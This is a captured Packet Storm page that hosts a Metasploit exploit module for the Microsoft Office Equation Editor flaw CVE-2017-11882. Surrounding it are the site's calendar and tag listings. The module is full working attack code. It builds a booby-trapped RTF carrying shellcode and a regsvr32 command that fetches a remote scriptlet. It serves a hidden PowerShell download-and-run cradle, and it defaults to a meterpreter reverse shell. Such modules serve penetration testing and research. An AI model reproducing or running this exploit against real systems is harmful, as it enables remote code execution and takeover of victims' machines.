packetstormsecurity.com
Open in
urlscan Pro
198.84.60.198
Public Scan
URL:
https://packetstormsecurity.com/files/145226/Microsoft-Office-Equation-Editor-Code-Execution.html
Submission: On April 22 via api from US — Scanned from DE
Submission: On April 22 via api from US — Scanned from DE
Form analysis
2 forms found in the DOMGET /search/
<form method="get" action="/search/"><input type="text" name="q" id="q" maxlength="120" value="Search …"><button type="submit"></button>
<div id="q-tabs"><label for="s-files" class="on">Files</label><label for="s-news">News</label><label for="s-users">Users</label><label for="s-authors">Authors</label><input type="radio" value="files" name="s" id="s-files"><input type="radio"
value="news" name="s" id="s-news"><input type="radio" value="users" name="s" id="s-users"><input type="radio" value="authors" name="s" id="s-authors"></div>
</form>
GET /files/cal/
<form id="cal" action="/files/cal/" method="get">
<h2>File Archive:</h2>
<h3>April 2024</h3>
<button id="cal-prev" name="cal-prev" type="button" value="2024-4"><span><</span></button>
<ul class="dotw">
<li>Su</li>
<li>Mo</li>
<li>Tu</li>
<li>We</li>
<li>Th</li>
<li>Fr</li>
<li>Sa</li>
</ul>
<ul>
<li></li>
<li class="low"><a href="/files/date/2024-04-01/">1</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 1st</div>
<div class="count">10 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-02/">2</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 2nd</div>
<div class="count">26 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-03/">3</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 3rd</div>
<div class="count">40 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-04-04/">4</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 4th</div>
<div class="count">6 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-05/">5</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 5th</div>
<div class="count">26 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-06/">6</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 6th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-04-07/">7</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 7th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-08/">8</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 8th</div>
<div class="count">22 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-04-09/">9</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 9th</div>
<div class="count">14 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-04-10/">10</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 10th</div>
<div class="count">10 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-04-11/">11</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 11th</div>
<div class="count">13 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-04-12/">12</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 12th</div>
<div class="count">14 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-13/">13</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 13th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-04-14/">14</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 14th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-15/">15</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 15th</div>
<div class="count">30 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-04-16/">16</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 16th</div>
<div class="count">10 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-17/">17</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 17th</div>
<div class="count">22 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-18/">18</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 18th</div>
<div class="count">45 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-19/">19</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 19th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-20/">20</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 20th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-04-21/">21</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 21st</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none today"><a href="/files/date/2024-04-22/">22</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 22nd</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-23/">23</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 23rd</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-24/">24</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 24th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-25/">25</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 25th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-26/">26</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 26th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-27/">27</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 27th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-04-28/">28</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 28th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-29/">29</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 29th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-30/">30</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 30th</div>
<div class="count">0 Files</div>
</div>
</li>
<li></li>
<li></li>
<li></li>
<li></li>
</ul>
</form>
Text Content
exploit the possibilities Register | Login FilesNewsUsersAuthors Home Files News &[SERVICES_TAB]About Contact Add New MICROSOFT OFFICE EQUATION EDITOR CODE EXECUTION Microsoft Office Equation Editor Code Execution Posted Dec 6, 2017 Authored by embedi, Mumbai | Site metasploit.com This Metasploit module exploits a flaw in how the Equation Editor handles OLE objects in memory to execute arbitrary code using RTF files without interaction. tags | exploit, arbitrary advisories | CVE-2017-11882 SHA-256 | 16ad4379e6651e3ce0e9433a9c32d2a5e70809affcfd3f999c329227ce6dbc46 Download | Favorite | View Related Files SHARE THIS * * * LinkedIn * Reddit * Digg * StumbleUpon MICROSOFT OFFICE EQUATION EDITOR CODE EXECUTION Change Mirror Download ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Powershell include Msf::Exploit::EXE include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Office CVE-2017-11882', 'Description' => %q{ Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory. }, 'Author' => ['mumbai', 'embedi'], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Nov 15 2017', 'References' => [ ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'], ['URL', 'https://github.com/embedi/CVE-2017-11882'] ], 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ ['Microsoft Office', {} ], ], 'DefaultTarget' => 0, 'Payload' => { 'DisableNops' => true }, 'Stance' => Msf::Exploit::Stance::Aggressive, 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } )) register_options([ OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]), OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil]) ]) end def retrieve_header(filename) if (not datastore['FOLDER_PATH'].nil?) path = "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}" else path = nil end if (not path.nil?) if ::File.file?(path) File.open(path, 'rb') do |fd| header = fd.read(fd.stat.size).split('{\*\datastore').first header = header.to_s # otherwise I get nil class... print_status("Injecting #{path}...") return header end else header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' end else header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' end return header end def generate_rtf header = retrieve_header(datastore['FILENAME']) object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata ' object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000' object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' object_class << '09000600000000000000000000000100000001000000000000000010000002000' object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040' object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0' object_class << '07400720079000000000000000000000000000000000000000000000000000000' object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000' object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce' object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000' object_class << '00000000000000000000000000000000000000000000000000000000000000000' object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0' object_class << '00000000000000000000000000000000000000000000000000000000000000000' object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000' object_class << '00000000000000000000000000000000000000000000000000000000000000000' object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000' object_class << '00000000000000000000000000000000000000000000000000000000000000000' object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000' object_class << '00000000000000000000000000000000000000000000000000000000000000000' object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000' object_class << '00000000000000000000000000000000000000000000000000000000000000003' object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060' object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000' object_class << '00000000000000000000000000000000000000000000000000000000000000000' object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000' object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000' object_class << '00000000000000000000000000000000000000000000000000000000000000000' object_class << "00000300040000000000000000000000000000000000000000000000000000000" object_class << "000000000000000000000000000000000000000000000000000000000000000\n" shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0 shellcode << "\x00\x00" # 2: 00 00 add BYTE PTR [eax],al shellcode << "\x02\x00" # 4: 02 00 add al,BYTE PTR [eax] shellcode << "\x9e" # 6: 9e sahf shellcode << "\xc4\xa9\x00\x00\x00\x00" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0] shellcode << "\x00\x00" # d: 00 00 add BYTE PTR [eax],al shellcode << "\x00\xc8" # f: 00 c8 add al,cl shellcode << "\xa7" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi] shellcode << "\\" # 12: 5c pop esp shellcode << "\x00\xc4" # 13: 00 c4 add ah,al shellcode << "\xee" # 15: ee out dx,al shellcode << "[" # 16: 5b pop ebx shellcode << "\x00\x00" # 17: 00 00 add BYTE PTR [eax],al shellcode << "\x00\x00" # 19: 00 00 add BYTE PTR [eax],al shellcode << "\x00\x03" # 1b: 00 03 add BYTE PTR [ebx],al shellcode << "\x01\x01" # 1d: 01 01 add DWORD PTR [ecx],eax shellcode << "\x03\n" # 1f: 03 0a add ecx,DWORD PTR [edx] shellcode << "\n\x01" # 21: 0a 01 or al,BYTE PTR [ecx] shellcode << "\x08ZZ" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl shellcode << "\xB8\x44\xEB\x71\x12" # 26: b8 44 eb 71 12 mov eax,0x1271eb44 shellcode << "\xBA\x78\x56\x34\x12" # 2b: ba 78 56 34 12 mov edx,0x12345678 shellcode << "\x31\xD0" # 30: 31 d0 xor eax,edx shellcode << "\x8B\x08" # 32: 8b 08 mov ecx,DWORD PTR [eax] shellcode << "\x8B\x09" # 34: 8b 09 mov ecx,DWORD PTR [ecx] shellcode << "\x8B\x09" # 36: 8b 09 mov ecx,DWORD PTR [ecx] shellcode << "\x66\x83\xC1\x3C" # 38: 66 83 c1 3c add cx,0x3c shellcode << "\x31\xDB" # 3c: 31 db xor ebx,ebx shellcode << "\x53" # 3e: 53 push ebx shellcode << "\x51" # 3f: 51 push ecx shellcode << "\xBE\x64\x3E\x72\x12" # 40: be 64 3e 72 12 mov esi,0x12723e64 shellcode << "\x31\xD6" # 45: 31 d6 xor esi,edx shellcode << "\xFF\x16" # 47: ff 16 call DWORD PTR [esi] shellcode << "\x53" # 49: 53 push ebx shellcode << "\x66\x83\xEE\x4C" # 4a: 66 83 ee 4c sub si,0x4c shellcode << "\xFF\x10" # 4e: ff 10 call DWORD PTR [eax] shellcode << "\x90" # 50: 90 nop shellcode << "\x90" # 50: 90 nop footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' footer << '4500710075006100740069006F006E0020004E006100740069007600650000000' footer << '00000000000000000000000000000000000000000000000000000' footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000' footer << '00000000000000000000000000000000000000000000000000000000000000400' footer << '0000C5000000000000000000000000000000000000000000000000' footer << '0000000000000000000000000000000000000000000000000000000000000000' footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00' footer << '000000000000000000000000000000000000000000000000000000' footer << '0000000000000000000000000000000000000000000000000000000000000000' footer << '000000000000000000000000000000000000000000000000000000' footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF' footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000' footer << '00000000000000000000000000000000000000000000000000000000000000000' footer << '00000000000000000000000000000000000000000000000000000' footer << '00000000000000000000000000000000000000000000000000000000000000000' footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000' footer << '00000000000000000000000000000000000000000000000000000000000000000' footer << '00000000000000001050000050000000D0000004D45544146494C' footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C' footer << '500000002001C0000000000050000000902000000000500000002' footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF' footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090' footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016' footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131' footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000' footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100' footer << '00030000000000' + "\n" footer << '}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260' + "\n" footer << "0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\n" footer << "0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\n" footer << "1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\n" footer << "0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\n" footer << "0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\n" footer << "002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\n" footer << "000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\n" footer << "0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\n" footer << "00000000\n" footer << "}}}\n" footer << '\par}' + "\n" payload = shellcode payload += [0x00402114].pack("V") payload += "\x00" * 2 payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll" payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first payload = header + object_class + payload + footer payload end def gen_psh(url, *method) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl if method.include? 'string' download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) else # Random filename to use, if there isn't anything set random = "#{rand_text_alphanumeric 8}.exe" # Set filename (Use random filename if empty) filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME'] # Set path (Use %TEMP% if empty) path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') # Join Path and Filename file = %Q(echo (#{path}+'\\#{filename}')) # Generate download PowerShell command download_string = Rex::Powershell::PshMethods.download_run(url, file) end download_and_run = "#{ignore_cert}#{download_string}" # Generate main PowerShell command return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) end def on_request_uri(cli, _request) if _request.raw_uri =~ /\.sct$/ print_status("Handling request for .sct from #{cli.peerhost}") payload = gen_psh("#{get_uri}", "string") data = gen_sct_file(payload) send_response(cli, data, 'Content-Type' => 'text/plain') else print_status("Delivering payload to #{cli.peerhost}...") p = regenerate_payload(cli) data = cmd_psh_payload(p.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true ) send_response(cli, data, 'Content-Type' => 'application/octet-stream') end end def rand_class_id "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" end def gen_sct_file(command) # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error). if command == '' return %{<?XML version="1.0"?><scriptlet><registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"></registration></scriptlet>} # If a command is provided, tell the target system to execute it. else return %{<?XML version="1.0"?><scriptlet><registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>} end end def primer file_create(generate_rtf) end end Login or Register to add favorites * Follow us on Twitter * Follow us on Facebook * Subscribe to an RSS Feed FILE ARCHIVE: APRIL 2024 < * Su * Mo * Tu * We * Th * Fr * Sa * * 1 Apr 1st 10 Files * 2 Apr 2nd 26 Files * 3 Apr 3rd 40 Files * 4 Apr 4th 6 Files * 5 Apr 5th 26 Files * 6 Apr 6th 0 Files * 7 Apr 7th 0 Files * 8 Apr 8th 22 Files * 9 Apr 9th 14 Files * 10 Apr 10th 10 Files * 11 Apr 11th 13 Files * 12 Apr 12th 14 Files * 13 Apr 13th 0 Files * 14 Apr 14th 0 Files * 15 Apr 15th 30 Files * 16 Apr 16th 10 Files * 17 Apr 17th 22 Files * 18 Apr 18th 45 Files * 19 Apr 19th 0 Files * 20 Apr 20th 0 Files * 21 Apr 21st 0 Files * 22 Apr 22nd 0 Files * 23 Apr 23rd 0 Files * 24 Apr 24th 0 Files * 25 Apr 25th 0 Files * 26 Apr 26th 0 Files * 27 Apr 27th 0 Files * 28 Apr 28th 0 Files * 29 Apr 29th 0 Files * 30 Apr 30th 0 Files * * * * TOP AUTHORS IN LAST 30 DAYS * Red Hat 172 files * Ubuntu 47 files * Debian 22 files * LiquidWorm 11 files * Valentin Lobstein 11 files * nu11secur1ty 8 files * Apple 6 files * Google Security Research 5 files * tmrswrr 4 files * E1.Coders 4 files FILE TAGS * ActiveX (933) * Advisory (84,828) * Arbitrary (16,656) * BBS (2,859) * Bypass (1,832) * CGI (1,032) * Code Execution (7,633) * Conference (689) * Cracker (844) * CSRF (3,373) * DoS (24,569) * Encryption (2,383) * Exploit (52,830) * File Inclusion (4,253) * File Upload (986) * Firewall (822) * Info Disclosure (2,849) * Intrusion Detection (906) * Java (3,121) * JavaScript (890) * Kernel (7,018) * Local (14,713) * Magazine (586) * Overflow (13,048) * Perl (1,430) * PHP (5,199) * Proof of Concept (2,368) * Protocol (3,695) * Python (1,600) * Remote (31,425) * Root (3,618) * Rootkit (523) * Ruby (619) * Scanner (1,650) * Security Tool (7,981) * Shell (3,252) * Shellcode (1,217) * Sniffer (900) * Spoof (2,258) * SQL Injection (16,538) * TCP (2,424) * Trojan (689) * UDP (897) * Virus (669) * Vulnerability (32,598) * Web (9,877) * Whitepaper (3,773) * x86 (967) * XSS (18,177) * Other FILE ARCHIVES * April 2024 * March 2024 * February 2024 * January 2024 * December 2023 * November 2023 * October 2023 * September 2023 * August 2023 * July 2023 * June 2023 * May 2023 * Older SYSTEMS * AIX (429) * Apple (2,078) * BSD (376) * CentOS (58) * Cisco (1,927) * Debian (7,014) * Fedora (1,693) * FreeBSD (1,246) * Gentoo (4,467) * HPUX (880) * iOS (373) * iPhone (108) * IRIX (220) * Juniper (69) * Linux (49,227) * Mac OS X (691) * Mandriva (3,105) * NetBSD (256) * OpenBSD (488) * RedHat (15,501) * Slackware (941) * Solaris (1,611) * SUSE (1,444) * Ubuntu (9,439) * UNIX (9,391) * UnixWare (187) * Windows (6,649) * Other © 2022 Packet Storm. All rights reserved. Site Links News by Month News Tags Files by Month File Tags File Directory About Us History & Purpose Contact Information Terms of Service Privacy Statement Copyright Information Services Security Services Hosting By Rokasec * Follow us on Twitter * Follow us on Facebook * Subscribe to an RSS Feed